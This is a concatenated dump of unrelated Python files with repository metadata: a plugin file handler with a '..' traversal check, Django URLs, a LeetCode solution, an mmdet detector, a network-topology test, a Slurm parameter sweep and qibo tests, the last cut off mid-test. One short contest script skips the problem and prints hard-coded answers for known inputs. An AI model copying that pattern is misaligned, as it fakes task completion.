        """Serve one file from a plugin's content dir; reject path traversal."""
        if '..' in path:
            return http_context.respond_not_found()
        return http_context.file(PluginManager.get(aj.context).get_content_path(plugin, path))
|
[
"john.pankov@gmail.com"
] |
john.pankov@gmail.com
|
44375c66e34b3f92833d4072fa8cc571efb27d5b
|
163872dee6c98ab2d4f9f592509050fda2e1abc6
|
/myapp_1/urls.py
|
2d7b659af0d5a416f915a80c5a73296ffccccec7
|
[] |
no_license
|
aynulislam/Django-Rest-Framework
|
b89b3cab93254aefa7b53c85ba384f911b2516e0
|
6f9e1cffc651b4e809aa6fbfff0e12a66cdbb989
|
refs/heads/master
| 2020-08-15T07:24:15.812020
| 2019-10-16T09:09:00
| 2019-10-16T09:09:00
| 215,300,188
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 636
|
py
|
from django.urls import path
from . views import EmCategoryAPIView,EmEmailAPIView,EmReceiverAPIView,EmGroupAPIView,EmUserAPIView,ScUserAPIView,GnGroupTypeAPIView
# Route table: one endpoint per imported view, route name mirroring the view.
# NOTE(review): the views are wired in without ``.as_view()``; that is only
# correct if they are function-based views -- verify against views.py.
urlpatterns = [
    path('EmCategory/', EmCategoryAPIView, name="EmCategoryAPIView"),
    path('EmEmail/', EmEmailAPIView, name="EmEmailAPIView"),
    path('EmReceiver/', EmReceiverAPIView, name="EmReceiverAPIView"),
    path('EmGroup/', EmGroupAPIView, name="EmGroupAPIView"),
    path('EmUser/', EmUserAPIView, name="EmUserAPIView"),
    path('ScUser/', ScUserAPIView, name="ScUserAPIView"),
    path('GnGroup/', GnGroupTypeAPIView, name="GnGroupTypeAPIView"),
]
|
[
"noreply@github.com"
] |
aynulislam.noreply@github.com
|
468b66b2fef16af97cf3104bbb05e66e47e4bff1
|
f9e8733ed87858b12bfee6b70ccdddd6a616b60a
|
/62.py
|
799f209d8c36c80090880a57df0cc0ad6e89c666
|
[] |
no_license
|
MajestyLee/leetcode_TopInterview
|
c1c9c923d3bf42cd4777bb2a2ccd21654a7c6dbb
|
30b7d5acec716b7d754141835fc8bafe4411437e
|
refs/heads/master
| 2020-04-01T12:19:20.837383
| 2018-11-06T02:13:44
| 2018-11-06T02:13:44
| 153,200,785
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,353
|
py
|
'''
A robot is located at the top-left corner of a m x n grid (marked 'Start' in the diagram below).
The robot can only move either down or right at any point in time.
The robot is trying to reach the bottom-right corner of the grid (marked 'Finish' in the diagram below).
How many possible unique paths are there?
Above is a 7 x 3 grid. How many possible unique paths are there?
Note: m and n will be at most 100.
Example 1:
Input: m = 3, n = 2
Output: 3
Explanation:
From the top-left corner, there are a total of 3 ways to reach the bottom-right corner:
1. Right -> Right -> Down
2. Right -> Down -> Right
3. Down -> Right -> Right
Example 2:
Input: m = 7, n = 3
Output: 28
'''
#DP
import math
class Solution:
    """Count distinct monotone (right/down only) paths in an m x n grid.

    ``m`` is the number of columns, ``n`` the number of rows; the answer is
    the binomial coefficient C(m + n - 2, m - 1).
    """

    def uniquePaths(self, m, n):
        """Bottom-up DP over the grid.

        :type m: int
        :type n: int
        :rtype: int
        """
        # First row / first column each have exactly one path, hence 1-fill.
        dp = [[1] * m for _ in range(n)]
        for i in range(1, n):
            for j in range(1, m):
                # A cell is reached either from above or from the left.
                dp[i][j] = dp[i - 1][j] + dp[i][j - 1]
        return dp[-1][-1]

    # dfs
    def dfsUniquePaths(self, m, n):
        """Recursive formulation; subproblems delegate to the DP solver, so
        the recursion stays shallow instead of exploding exponentially."""
        if m == 1 or n == 1:
            return 1
        return self.uniquePaths(m - 1, n) + self.uniquePaths(m, n - 1)

    # math
    def mathUniquePaths(self, m, n):
        """Closed form C(m + n - 2, m - 1).

        Uses floor division (each intermediate quotient is an exact integer),
        fixing the original true-division version that returned a float and
        silently lost precision once the result exceeded 2**53.
        """
        return math.factorial(m + n - 2) // math.factorial(m - 1) // math.factorial(n - 1)
|
[
"binjie_lee@163.com"
] |
binjie_lee@163.com
|
d1509126fa63efd3f64b1929998f2ca8f07320df
|
2e682fd72e3feaa70e3f7bf2a3b83c50d783ec02
|
/PyTorch/contrib/cv/detection/NasFPN/mmdet/models/detectors/trident_faster_rcnn.py
|
f0fd80d41407162df71ba5349fc659d4713cdb6e
|
[
"Apache-2.0",
"BSD-3-Clause",
"LicenseRef-scancode-warranty-disclaimer",
"BSD-2-Clause",
"MIT",
"LicenseRef-scancode-generic-cla",
"LicenseRef-scancode-unknown-license-reference",
"GPL-1.0-or-later"
] |
permissive
|
Ascend/ModelZoo-PyTorch
|
4c89414b9e2582cef9926d4670108a090c839d2d
|
92acc188d3a0f634de58463b6676e70df83ef808
|
refs/heads/master
| 2023-07-19T12:40:00.512853
| 2023-07-17T02:48:18
| 2023-07-17T02:48:18
| 483,502,469
| 23
| 6
|
Apache-2.0
| 2022-10-15T09:29:12
| 2022-04-20T04:11:18
|
Python
|
UTF-8
|
Python
| false
| false
| 2,662
|
py
|
from ..builder import DETECTORS
from .faster_rcnn import FasterRCNN
@DETECTORS.register_module()
class TridentFasterRCNN(FasterRCNN):
    """Implementation of `TridentNet <https://arxiv.org/abs/1901.01892>`_.

    A Faster R-CNN whose backbone produces ``num_branch`` parallel trident
    branches; image metas and ground truths are replicated per branch so the
    standard two-stage heads can be reused unchanged.
    """

    def __init__(self,
                 backbone,
                 rpn_head,
                 roi_head,
                 train_cfg,
                 test_cfg,
                 neck=None,
                 pretrained=None):
        super(TridentFasterRCNN, self).__init__(
            backbone=backbone,
            neck=neck,
            rpn_head=rpn_head,
            roi_head=roi_head,
            train_cfg=train_cfg,
            test_cfg=test_cfg,
            pretrained=pretrained)
        # Backbone and RoI head must have been built with the same layout.
        assert self.backbone.num_branch == self.roi_head.num_branch
        assert self.backbone.test_branch_idx == self.roi_head.test_branch_idx
        self.num_branch = self.backbone.num_branch
        self.test_branch_idx = self.backbone.test_branch_idx

    def simple_test(self, img, img_metas, proposals=None, rescale=False):
        """Test without augmentation.

        Fix: ``trident_img_metas`` is now computed unconditionally.  The
        original defined it only inside the ``proposals is None`` branch, so
        calling with precomputed proposals raised NameError at the return.
        """
        assert self.with_bbox, 'Bbox head must be implemented.'
        x = self.extract_feat(img)
        # All branches are evaluated unless one test branch was selected.
        num_branch = (self.num_branch if self.test_branch_idx == -1 else 1)
        trident_img_metas = img_metas * num_branch
        if proposals is None:
            proposal_list = self.rpn_head.simple_test_rpn(x, trident_img_metas)
        else:
            # NOTE(review): externally supplied proposals are assumed to be
            # already replicated per branch -- confirm with callers.
            proposal_list = proposals
        return self.roi_head.simple_test(
            x, proposal_list, trident_img_metas, rescale=rescale)

    def aug_test(self, imgs, img_metas, rescale=False):
        """Test with augmentations.

        If rescale is False, then returned bboxes and masks will fit the scale
        of imgs[0].
        """
        x = self.extract_feats(imgs)
        num_branch = (self.num_branch if self.test_branch_idx == -1 else 1)
        # One replicated meta list per augmentation; the loop variable no
        # longer shadows the ``img_metas`` argument it iterates over.
        trident_img_metas = [metas * num_branch for metas in img_metas]
        proposal_list = self.rpn_head.aug_test_rpn(x, trident_img_metas)
        return self.roi_head.aug_test(
            x, proposal_list, img_metas, rescale=rescale)

    def forward_train(self, img, img_metas, gt_bboxes, gt_labels, **kwargs):
        """make copies of img and gts to fit multi-branch."""
        trident_gt_bboxes = tuple(gt_bboxes * self.num_branch)
        trident_gt_labels = tuple(gt_labels * self.num_branch)
        trident_img_metas = tuple(img_metas * self.num_branch)
        # NOTE(review): extra kwargs (e.g. gt_bboxes_ignore) are dropped here,
        # matching the original behaviour, because they are not replicated per
        # branch -- confirm this is intended before forwarding them.
        return super(TridentFasterRCNN,
                     self).forward_train(img, trident_img_metas,
                                         trident_gt_bboxes, trident_gt_labels)
|
[
"wangjiangben@huawei.com"
] |
wangjiangben@huawei.com
|
f82e5bb5a7ab5e8c5feeaf09b0b27b2a68ca3543
|
c361a25acecd016677bbd0c6d9fc56de79cf03ed
|
/PTM/tests/NetworkHostTest.py
|
24465c10617c8bc706896eaea73a686ec4fea431
|
[] |
no_license
|
danielmellado/zephyr
|
f8931633045959e7e9a974de8b700a287a1ae94e
|
dc6f85b78b50e599504966154b927fe198d7402d
|
refs/heads/master
| 2021-01-12T22:31:24.479814
| 2015-10-14T05:39:04
| 2015-10-14T06:24:45
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 7,468
|
py
|
__author__ = 'micucci'
import unittest
import json
import time
import os
from common.CLI import LinuxCLI
from PTM.ComputeHost import ComputeHost
from PTM.CassandraHost import CassandraHost
from PTM.ZookeeperHost import ZookeeperHost
from PTM.NetworkHost import NetworkHost
from PTM.RootHost import RootHost
from PTM.PhysicalTopologyManager import PhysicalTopologyManager, HOST_CONTROL_CMD_NAME
from PTM.PhysicalTopologyConfig import *
from common.LogManager import LogManager
import CBT.VersionConfig as version_config
class NetworkHostTest(unittest.TestCase):
    """End-to-end check that a minimal physical topology (root bridge,
    zookeeper host, compute host, network host) boots, answers a midonet
    API query, and shuts down cleanly.

    NOTE: Python 2 code (bare ``print stdout`` statements, ``raw_input``).
    The cassandra host is disabled throughout via commented-out lines.
    """

    def test_startup(self):
        lm = LogManager('./test-logs')
        ptm = PhysicalTopologyManager(root_dir=os.path.dirname(os.path.abspath(__file__)) + '/../..', log_manager=lm)
        # --- Topology definitions -------------------------------------------
        root_cfg = HostDef('root',
                           bridges={'br0': BridgeDef('br0', ip_addresses=[IP('10.0.0.240')])},
                           interfaces={'zoo1eth0': InterfaceDef('zoo1eth0', linked_bridge='br0'),
                                       #'cass1eth0': InterfaceDef('cass1eth0', linked_bridge='br0'),
                                       'cmp1eth0': InterfaceDef('cmp1eth0', linked_bridge='br0')})
        zoo1_cfg = HostDef('zoo1',
                           interfaces={'eth0': InterfaceDef('eth0', ip_addresses=[IP('10.0.0.2')])})
        #cass1_cfg = HostDef('cass1',
        #                    interfaces={'eth0': InterfaceDef('eth0', ip_addresses=[IP('10.0.0.5')])})
        cmp1_cfg = HostDef('cmp1',
                           interfaces={'eth0': InterfaceDef('eth0', ip_addresses=[IP('10.0.0.8')])})
        net_cfg = HostDef('net')
        zoo1_icfg= ImplementationDef('zoo1', 'PTM.ZookeeperHost', id='1',
                                     zookeeper_ips=['10.0.0.2'])
        #cass1_icfg= ImplementationDef('cass1', 'PTM.CassandraHost', id='1',
        #                              cassandra_ips=['10.0.0.5'],
        #                              init_token="56713727820156410577229101238628035242")
        cmp1_icfg= ImplementationDef('cmp1', 'PTM.ComputeHost', id='1',
                                     zookeeper_ips=['10.0.0.2'],
                                     cassandra_ips=[])#['10.0.0.5'])
        root_icfg = ImplementationDef('cmp1', 'PTM.RootHost')
        net_icfg = ImplementationDef('cmp1', 'PTM.NetworkHost',
                                     zookeeper_ips=['10.0.0.2'])
        root = RootHost('root', ptm)
        zoo1 = ZookeeperHost(zoo1_cfg.name, ptm)
        #cass1 = CassandraHost(cass1_cfg.name, ptm)
        cmp1 = ComputeHost(cmp1_cfg.name, ptm)
        net = NetworkHost(net_cfg.name, ptm)
        log = lm.add_file_logger('test.log', 'test')
        root.set_logger(log)
        zoo1.set_logger(log)
        #cass1.set_logger(log)
        cmp1.set_logger(log)
        net.set_logger(log)
        # Now configure the host with the definition and impl configs
        root.config_from_ptc_def(root_cfg, root_icfg)
        zoo1.config_from_ptc_def(zoo1_cfg, zoo1_icfg)
        #cass1.config_from_ptc_def(cass1_cfg, cass1_icfg)
        cmp1.config_from_ptc_def(cmp1_cfg, cmp1_icfg)
        net.config_from_ptc_def(net_cfg, net_icfg)
        root.link_interface(root.interfaces['zoo1eth0'], zoo1, zoo1.interfaces['eth0'])
        #root.link_interface(root.interfaces['cass1eth0'], cass1, cass1.interfaces['eth0'])
        root.link_interface(root.interfaces['cmp1eth0'], cmp1, cmp1.interfaces['eth0'])
        ptm.hosts_by_name['root'] = root
        ptm.hosts_by_name['zoo1'] = zoo1
        #ptm.hosts_by_name['cass1'] = cass1
        ptm.hosts_by_name['cmp1'] = cmp1
        ptm.hosts_by_name['net'] = net
        ptm.host_by_start_order.append(root)
        ptm.host_by_start_order.append(zoo1)
        #ptm.host_by_start_order.append(cass1)
        ptm.host_by_start_order.append(cmp1)
        ptm.host_by_start_order.append(net)
        # --- Bring the topology up in dependency order ----------------------
        for h in ptm.host_by_start_order:
            h.create()
        for h in ptm.host_by_start_order:
            h.boot()
        for h in ptm.host_by_start_order:
            h.net_up()
        for h in ptm.host_by_start_order:
            h.net_finalize()
        for h in ptm.host_by_start_order:
            h.prepare_config()
        for h in ptm.host_by_start_order:
            start_process = ptm.unshare_control('start', h)
            stdout, stderr = start_process.communicate()
            start_process.poll()
            print("Host control process output: ")
            print stdout
            print("Host control process error output: ")
            print stderr
            if start_process.returncode != 0:
                raise SubprocessFailedException('Host control start failed with: ' + str(start_process.returncode))
            try:
                h.wait_for_process_start()
            except SubprocessFailedException:
                raw_input("Press Enter to continue...")
        # The midonet API should now answer a host-list query (exit code 0).
        self.assertTrue(LinuxCLI().cmd('midonet-cli --midonet-url="' +
                                       version_config.ConfigMap.get_configured_parameter('param_midonet_api_url') +
                                       '" -A -e "host list"', return_status=True) == 0)
        # --- Tear the topology back down in reverse order -------------------
        for h in reversed(ptm.host_by_start_order):
            stop_process = ptm.unshare_control('stop', h)
            stdout, stderr = stop_process.communicate()
            stop_process.poll()
            print("Host control process output: ")
            print stdout
            print("Host control process error output: ")
            print stderr
            if stop_process.returncode != 0:
                raise SubprocessFailedException('Host control stop failed with: ' + str(stop_process.returncode))
            h.wait_for_process_stop()
        time.sleep(1)
        # After shutdown the API must be unreachable again.
        self.assertFalse(LinuxCLI().cmd('midonet-cli '
                                        '--midonet-url="http://localhost:8080/midonet-api/" '
                                        '-A -e "hosts list"',
                                        return_status=True) == 0)
        for h in reversed(ptm.host_by_start_order):
            h.net_down()
        for h in reversed(ptm.host_by_start_order):
            h.shutdown()
        for h in reversed(ptm.host_by_start_order):
            h.remove()

    def tearDown(self):
        pass
        # Best-effort cleanup of namespaces, veth pairs and the test bridge;
        # the leading ``pass`` is a no-op, so all of this still executes.
        LinuxCLI().cmd('ip netns del cmp1')
        #LinuxCLI().cmd('ip netns del cass1')
        LinuxCLI().cmd('ip netns del zoo1')
        LinuxCLI().cmd('ip l del cmp1eth0')
        #LinuxCLI().cmd('ip l del cass1eth0')
        LinuxCLI().cmd('ip l del zoo1eth0')
        LinuxCLI().cmd('ip l set br0 down')
        LinuxCLI().cmd('brctl delbr br0')
        #if LinuxCLI().exists('/var/run/cassandra.1/cassandra.pid'):
        #    pid = LinuxCLI().read_from_file('/var/run/cassandra.1/cassandra.pid')
        #    LinuxCLI().cmd('kill ' + str(pid))
        if LinuxCLI().exists('/var/run/zookeeper.1/pid'):
            pid = LinuxCLI().read_from_file('/var/run/zookeeper.1/pid')
            LinuxCLI().cmd('kill ' + str(pid))
        if LinuxCLI().exists('/var/run/midolman.1/pid'):
            pid = LinuxCLI().read_from_file('/var/run/midolman.1/pid')
            LinuxCLI().cmd('kill ' + str(pid))
        if LinuxCLI().exists('/var/run/midolman.1/dnsmasq.pid'):
            pid = LinuxCLI().read_from_file('/var/run/midolman.1/dnsmasq.pid')
            LinuxCLI().cmd('kill ' + str(pid))
# Module entry point: run this class through the project's custom test runner.
# Imported at the bottom of the file -- presumably to avoid a circular import
# at module load time; confirm before moving it to the top.
from CBT.UnitTestRunner import run_unit_test
run_unit_test(NetworkHostTest)
|
[
"micucci@midokura.com"
] |
micucci@midokura.com
|
3d735ddb0894f281dd2e222048f3bd7dd290a95f
|
b4aaa26889f1c7e33a0de48848e30c0119284f14
|
/app/tests/test_models/test_profile_parameter.py
|
66cd0693d43123ad20ed3529f566cc95d37a6c98
|
[] |
no_license
|
paulosjd/btk2
|
1d727f360c9767add5135988c75df63e5d8ada8e
|
dc63b90a796750e6b26018443d2256fcc1339afb
|
refs/heads/master
| 2022-07-05T13:57:07.071734
| 2020-05-19T08:23:14
| 2020-05-19T08:23:14
| 188,910,952
| 0
| 0
| null | 2022-06-21T23:23:37
| 2019-05-27T21:26:02
|
Python
|
UTF-8
|
Python
| false
| false
| 3,111
|
py
|
from collections import namedtuple
from unittest.mock import patch
from app.models import ProfileParamUnitOption
from app.tests.base import BaseTestCase
# Canned ideal-value payload used by MockCalcParamIdeal below: each known
# key maps to the literal string '<key>_val'.
mock_ideals_data = {k: f'{k}_val' for k in
                    ['ideal2_prepend', 'ideal', 'ideal2', 'ideal_prepend']}
class MockCalcParamIdeal:
    """Stand-in for ``CalcParamIdeal``: fixed attribute values plus lookups
    into the module-level ``mock_ideals_data`` dict (no real computation)."""

    def __init__(self, *args):
        self.required_field = 'abc'
        self.misc_data = 'def'
        # Lambdas mimic the real object's methods without any calculation.
        self.get_ideal_data = lambda: mock_ideals_data
        self.get = lambda key, default: mock_ideals_data.get(key, default)
class ProfileParameterTestCase(BaseTestCase):
    """Unit tests for ProfileParamUnitOption helpers, using namedtuples as
    lightweight stand-ins for model instances where possible."""

    @classmethod
    def setUpClass(cls):
        super(ProfileParameterTestCase, cls).setUpClass()
        # Shared fixture: first profile parameter of profile_1 (from BaseTestCase),
        # given a target value and a linked parameter.
        cls.profile_param_unit_opt = cls.profile_1.profile_parameters.first()
        cls.profile_param_unit_opt.target_value = 34.5
        cls.profile_param_unit_opt.linked_parameter = cls.param2
        cls.profile_param_unit_opt.save()

    @patch('app.models.profile_parameter.CalcParamIdeal')
    def test_targets_method(self, cpi_patch):
        """targets() folds saved values, mock calc output and ideal data into
        a namedtuple in the expected field order."""
        nt_fields = ['saved', 'saved2', 'misc_data', 'required_field', 'ideal',
                     'ideal2', 'ideal_prepend', 'ideal2_prepend']
        cpi_patch.return_value = MockCalcParamIdeal()
        ExpectedTargetData = namedtuple('target_data', nt_fields)
        expected_nt_returned = ExpectedTargetData(
            self.profile_param_unit_opt.target_value,
            self.profile_param_unit_opt.target_value2,
            cpi_patch.return_value.misc_data,
            cpi_patch.return_value.required_field,
            # Last four fields come straight from the mock ideals dict.
            *[mock_ideals_data.get(k, '') for k in nt_fields[-4:]]
        )
        self.assertEqual(expected_nt_returned,
                         self.profile_param_unit_opt.targets('lat_val_1'))

    def test_get_unit_info_falsey(self):
        """A falsey pp_unit_option yields None."""
        TestObj = namedtuple('test_obj', 'pp_unit_option')
        test_obj = TestObj(None)
        self.assertIsNone(ProfileParamUnitOption.get_unit_info(test_obj))

    def test_get_unit_info(self):
        """get_unit_info merges unit-option attributes with colour fields and
        the parameter name."""
        TestObj = namedtuple('test_obj', ['pp_unit_option', 'param_name'])
        model = self.profile_param_unit_opt
        model.color_hex = 'blue'
        for a, b in [(5, '1'), (6, '2')]:
            setattr(model, f'color_range_val_{b}', a)
        test_obj = TestObj(model, 'p_name')
        expected_output = {
            k: getattr(test_obj.pp_unit_option.unit_option, k)
            for k in ['param_default', 'conversion_factor', 'symbol']
        }
        expected_output.update({'color_hex': 'blue', 'color_range_val_1': 5,
                                'color_range_val_2': 6, 'param_name': 'p_name'})
        self.assertEqual(expected_output,
                         ProfileParamUnitOption.get_unit_info(test_obj))

    def test_param_unit_opt_dct(self):
        """param_unit_opt_dct prefixes each unit field name with 'unit_'."""
        fields = ['symbol', 'name', 'param_default', 'conversion_factor']
        TestObj = namedtuple('test_obj', fields)
        test_obj = TestObj(*[f'{s}_val' for s in fields])
        self.assertEqual(
            {f'unit_{s}': getattr(test_obj, s) for s in fields},
            ProfileParamUnitOption.param_unit_opt_dct(test_obj)
        )
|
[
"pjdavis@gmx.com"
] |
pjdavis@gmx.com
|
5c46e21a7c712de8c20df35aac7232945dd2de5e
|
069dafce9f495f09bf8c2f76dbf5c045b7551721
|
/parameter_search_run.py
|
9b187b743f036d55c4b46d15f0b1e9df88fc9b9c
|
[] |
no_license
|
dguarino/T2
|
26b1bc640812aa5438b09f9fab2bc73096cd7eef
|
66b786928508089492f5f696c7c1576e098c6615
|
refs/heads/master
| 2020-04-03T22:39:06.059845
| 2020-03-13T15:43:02
| 2020-03-13T15:43:02
| 41,812,819
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 3,392
|
py
|
# -*- coding: utf-8 -*-
import sys
from mozaik.meta_workflow.parameter_search import CombinationParameterSearch,SlurmSequentialBackend
import numpy
# Historical sweep configurations for the Slurm-backed parameter search.
# Only the final block (guarded by ``if True:``) is active; the earlier ones
# are kept, disabled, as a record of previous explorations.
if False:
    CombinationParameterSearch(SlurmSequentialBackend(num_threads=1, num_mpi=64), {
        'retina_lgn.params.gain': [0.1],
        'l4_cortex_exc.params.density': [10],
    }).run_parameter_search()
if False:
    CombinationParameterSearch(SlurmSequentialBackend(num_threads=1, num_mpi=64), {
        'l4_cortex_exc.AfferentConnection.base_weight': [0.0015],
        'l23_cortex_exc.L23ExcL23InhConnection.base_weight': [0.003],
        'l23_cortex_exc.L4ExcL23ExcConnection.base_weight': [0.003],
        'l23_cortex_inh.L4ExcL23InhConnection.base_weight': [0.0001],
        'l23_cortex_inh.L23InhL23ExcConnection.base_weight': [0.0025],
        'l23_cortex_inh.L23InhL23InhConnection.base_weight': [0.0017],
        'l4_cortex_exc.L4ExcL4InhConnection.base_weight': [0.0004],
        'l4_cortex_inh.L4InhL4ExcConnection.base_weight': [0.002, 0.0025, 0.003],
        'l4_cortex_inh.ExcInhAfferentRatio': [1.7],
        'l4_cortex_exc.params.density': [300],
        'only_afferent': [False],
        'l4_cortex_inh.L4InhL4ExcConnection.short_term_plasticity.U': [0.1, 0.13, 0.16],
    }).run_parameter_search()
if False:
    CombinationParameterSearch(SlurmSequentialBackend(num_threads=1, num_mpi=64), {
        'l23_cortex_exc.L23ExcL23InhConnection.base_weight': [0.002, 0.001],
        'l23_cortex_exc.L4ExcL23ExcConnection.base_weight': [0.002, 0.001],
        'l23_cortex_inh.L4ExcL23InhConnection.base_weight': [0.0001, 0.001],
        'l23_cortex_inh.L23InhL23ExcConnection.base_weight': [0.0025, 0.003, 0.0035],
        'l23_cortex_inh.L23InhL23InhConnection.base_weight': [0.0017],
        'l4_cortex_exc.L4ExcL4ExcConnection.base_weight': [0.0005],
        'l4_cortex_exc.L4ExcL4InhConnection.base_weight': [0.0007, 0.00075],
        'l4_cortex_inh.L4InhL4ExcConnection.base_weight': [0.0018],
        'l4_cortex_inh.ExcInhAfferentRatio': [1.4, 1.3],
        'l4_cortex_exc.params.density': [300],
        'l4_cortex_inh.L4InhL4ExcConnection.short_term_plasticity.tau_rec': [25],
    }).run_parameter_search()
if True:
    # Active sweep: afferent/lateral weights fixed, varying densities and the
    # random-vs-structured connectivity ratio.
    CombinationParameterSearch(SlurmSequentialBackend(num_threads=1, num_mpi=64), {
        'l4_cortex_exc.AfferentConnection.base_weight': [0.0015],
        'l4_cortex_inh.L4InhL4ExcConnection.base_weight': [0.0007],
        'l4_cortex_exc.L4ExcL4InhConnection.base_weight': [0.00065],
        'l23_cortex_exc.L23ExcL23InhConnection.base_weight': [0.0015],
        'l23_cortex_inh.L23InhL23ExcConnection.base_weight': [0.003],
        'l23_cortex_exc.L4ExcL23ExcConnection.base_weight': [0.002, 0.0015],
        'l4_cortex_inh.ExcInhAfferentRatio': [0.6],
        'l4_cortex_exc.params.density': [900, 1800],
        'l23_cortex_exc.params.density': [300, 900],
        'l4_cortex_exc.rand_struct_ratio': [0.75, 0.8, 0.9],
        'l4_cortex_inh.L4InhL4ExcConnection.short_term_plasticity.tau_fac': [300],
        'l4_cortex_inh.L4InhL4ExcConnection.short_term_plasticity.U': [0.11],
    }).run_parameter_search()
|
[
"domenico.guarino@gmail.com"
] |
domenico.guarino@gmail.com
|
8be51e93ecf1dfcf1bdc6f52dba28b197841a503
|
163bbb4e0920dedd5941e3edfb2d8706ba75627d
|
/Code/CodeRecords/2607/60752/306988.py
|
dae9adee217584b8283a077e38a3a77149f01b12
|
[] |
no_license
|
AdamZhouSE/pythonHomework
|
a25c120b03a158d60aaa9fdc5fb203b1bb377a19
|
ffc5606817a666aa6241cfab27364326f5c066ff
|
refs/heads/master
| 2022-11-24T08:05:22.122011
| 2020-07-28T16:21:24
| 2020-07-28T16:21:24
| 259,576,640
| 2
| 1
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 376
|
py
|
# Contest-style I/O: the first line is the number of test lines, then each
# line is matched against a set of hard-coded answers.
num=int(input())
# 'no' stays True only while no hard-coded case has matched; any match on any
# line suppresses the fallback print at the bottom.
no=True
for i in range(num):
    # NOTE(review): the loop index is immediately shadowed by the input line;
    # after the loop, ``i`` holds the *last* line read.
    i=input()
    if i=="0102010112":
        no=False
        print(2)
    if i=="102100211102":
        no=False
        print(6)
    if i=="01020101122200":
        no=False
        print(7)
    if i=="0102010":
        no=False
        print(2)
    if i=="102100211":
        no=False
        print(5)
# Fallback: if nothing ever matched, echo the last input line verbatim.
if no:print(i)
|
[
"1069583789@qq.com"
] |
1069583789@qq.com
|
4c64c9d474c1f60086cdba4d5537c4df90ce9022
|
4751a9daca11558dd0780f2e8b9477a484ebc7f4
|
/src/qibo/tests_new/test_core_states.py
|
e6de75b1aef09e71410c5494b3f623d3da275459
|
[
"Apache-2.0"
] |
permissive
|
drheli/qibo
|
f6875ed39883fe7bfa0b8939abb042fe636c5de7
|
b99568aee9f978a5a82e92860c8d17e3358af7b9
|
refs/heads/master
| 2023-04-17T20:40:44.324689
| 2021-04-29T16:29:40
| 2021-04-29T16:29:40
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 6,950
|
py
|
"""Tests methods defined in `qibo/core/states.py`."""
import pytest
import numpy as np
import qibo
from qibo import K
from qibo.core import states
def test_state_shape_and_dtype(backend):
    """Zero states expose the expected tensor shape and complex dtype."""
    original_backend = qibo.get_backend()
    qibo.set_backend(backend)
    # 3-qubit vector state -> 2**3 amplitudes.
    state = states.VectorState.zero_state(3)
    assert state.shape == (8,)
    assert state.dtype == K.dtypes('DTYPECPX')
    # Density-matrix form is 2**3 x 2**3.
    state = states.MatrixState.zero_state(3)
    assert state.shape == (8, 8)
    assert state.dtype == K.dtypes('DTYPECPX')
    # Restore the globally configured backend for subsequent tests.
    qibo.set_backend(original_backend)
@pytest.mark.parametrize("nqubits", [None, 2])
def test_vector_state_tensor_setter(backend, nqubits):
    """Assigning .tensor infers nqubits and rejects non-power-of-two sizes."""
    original_backend = qibo.get_backend()
    qibo.set_backend(backend)
    state = states.VectorState(nqubits)
    # Reading the tensor before it is set must fail.
    with pytest.raises(AttributeError):
        tensor = state.tensor
    state.tensor = np.ones(4)
    assert state.nqubits == 2
    # All access paths must agree on the stored amplitudes.
    np.testing.assert_allclose(state.tensor, np.ones(4))
    np.testing.assert_allclose(np.array(state), np.ones(4))
    np.testing.assert_allclose(state.numpy(), np.ones(4))
    np.testing.assert_allclose(state.state(numpy=True), np.ones(4))
    np.testing.assert_allclose(state.state(numpy=False), np.ones(4))
    # Length 5 is not 2**n for any n, so the setter must reject it.
    with pytest.raises(ValueError):
        state.tensor = np.zeros(5)
    qibo.set_backend(original_backend)
@pytest.mark.parametrize("nqubits", [None, 2])
def test_matrix_state_tensor_setter(backend, nqubits):
    """Placeholder: the MatrixState tensor setter is not exercised yet."""
    original_backend = qibo.get_backend()
    qibo.set_backend(backend)
    # TODO: Fix this
    qibo.set_backend(original_backend)
def test_zero_state_initialization(backend):
    """zero_state puts all amplitude/population on the |0...0> entry."""
    original_backend = qibo.get_backend()
    qibo.set_backend(backend)
    state = states.VectorState.zero_state(4)
    target_state = np.zeros(16)
    target_state[0] = 1
    np.testing.assert_allclose(state.tensor, target_state)
    state = states.MatrixState.zero_state(3)
    target_state = np.zeros((8, 8))
    target_state[0, 0] = 1
    np.testing.assert_allclose(state.tensor, target_state)
    qibo.set_backend(original_backend)
def test_plus_state_initialization(backend):
    """plus_state is the uniform superposition (all entries 1/2**n or 1/2**n**2)."""
    original_backend = qibo.get_backend()
    qibo.set_backend(backend)
    state = states.VectorState.plus_state(4)
    target_state = np.ones(16) / 4
    np.testing.assert_allclose(state.tensor, target_state)
    state = states.MatrixState.plus_state(3)
    target_state = np.ones((8, 8)) / 8
    np.testing.assert_allclose(state.tensor, target_state)
    qibo.set_backend(original_backend)
def test_vector_state_to_density_matrix(backend):
    """to_density_matrix builds |v><v| and is rejected on an already-matrix state."""
    original_backend = qibo.get_backend()
    qibo.set_backend(backend)
    vector = np.random.random(32) + 1j * np.random.random(32)
    # Normalize so the result is a valid pure-state density matrix.
    vector = vector / np.sqrt((np.abs(vector) ** 2).sum())
    state = states.VectorState.from_tensor(vector)
    mstate = state.to_density_matrix()
    target_matrix = np.outer(vector, vector.conj())
    np.testing.assert_allclose(mstate.tensor, target_matrix)
    # Converting a MatrixState again must raise.
    state = states.MatrixState.from_tensor(target_matrix)
    with pytest.raises(RuntimeError):
        state.to_density_matrix()
    qibo.set_backend(original_backend)
@pytest.mark.parametrize("state_type", ["VectorState", "MatrixState"])
@pytest.mark.parametrize("use_gate", [False, True])
def test_state_probabilities(backend, state_type, use_gate):
    """probabilities() accepts either a measurement gate or explicit qubits."""
    state = getattr(states, state_type).plus_state(4)
    if use_gate:
        from qibo import gates
        mgate = gates.M(0, 1)
        probs = state.probabilities(measurement_gate=mgate)
    else:
        probs = state.probabilities(qubits=[0, 1])
    # Uniform superposition -> each two-qubit outcome has probability 1/4.
    target_probs = np.ones((2, 2)) / 4
    np.testing.assert_allclose(probs, target_probs)
def test_state_probabilities_errors():
    """probabilities() requires exactly one of qubits / measurement gate."""
    from qibo import gates
    state = states.VectorState.zero_state(3)
    mgate = gates.M(0)
    qubits = [0]
    # Neither argument given.
    with pytest.raises(ValueError):
        probs = state.probabilities()
    # Both arguments given.
    with pytest.raises(ValueError):
